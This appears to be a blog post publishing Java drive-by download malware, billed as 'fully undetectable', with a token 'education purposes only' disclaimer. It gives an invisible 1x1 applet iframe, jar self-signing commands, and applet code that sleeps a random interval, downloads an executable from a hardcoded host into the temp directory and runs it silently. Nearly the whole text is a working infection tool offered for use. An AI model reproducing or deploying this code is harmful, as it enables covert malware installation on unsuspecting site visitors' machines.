Published code:
/*
* java drive-by tmpdir (2,754 bytes)
* fully undetectable (FUD)
*
* This software must be used for education purposes only!
* By using this software in any other way you may violate the law!
*
* author: sp3c1aliz3d
* jabber: sp3c1aliz3d@neko.im
* twitter: @Sp3c1aliz3d
*
*/
/* html iframe iframe.html */
// iframe.html <applet width='1' height='1' code="update.class" archive="update.jar"> </applet>
/* compile/setup setup.sh
javac update.java
jar -cfv update.jar update.class
jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar update.jar update.jar signapplet
/* java (update.class/update.jar) */
import java.applet.*;
import java.awt.*;
import java.io.*;
import java.io.File;
import java.io.IOException;
import java.nio.channels.*;
import java.net.URL;
import java.io.FileOutputStream;
import java.util.Random;
import static java.lang.Thread.sleep; // no need for full import list
public class update extends Applet {
public void init() {
try {
Random random = new Random();
try {
sleep(random.nextInt(9000) + 1);
} catch (Exception e) {
System.out.println(e);
}
Process localProcess = null;
URL website = new URL("http://192.168.1.64/xxx.exe");
ReadableByteChannel rbc = Channels.newChannel(website.openStream());
FileOutputStream fos = new FileOutputStream(System.getProperty("java.io.tmpdir") + "xxx.exe");
fos.getChannel().transferFrom(rbc, 0, 1 << 24);
fos.close();
localProcess = Runtime.getRuntime().exec(System.getProperty("java.io.tmpdir") + "xxx.exe");
} catch( Throwable e ){}
}|
No comments:
Post a Comment